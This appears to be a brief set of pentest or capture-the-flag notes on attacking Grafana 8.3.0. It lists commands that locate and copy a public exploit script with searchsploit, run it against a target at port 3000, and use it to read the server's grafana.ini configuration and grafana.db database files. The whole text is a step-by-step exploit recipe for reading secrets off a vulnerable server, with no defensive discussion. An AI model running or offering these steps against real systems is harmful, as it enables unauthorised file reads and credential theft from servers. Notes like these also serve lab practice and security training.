Skip to content

Grafana

Grafana 8.3.0

exploit

searchsploit Grafana 8.3.0
searchsploit -m multiple/webapps/50581.py
python3 50581.py -H http://$IP:3000
Read file > /etc/grafana/grafana.ini
Read file > /etc/grafana/grafana.db
Read file > /usr/share/grafana/grafana.db
Read file > /var/lib/grafana/grafana.db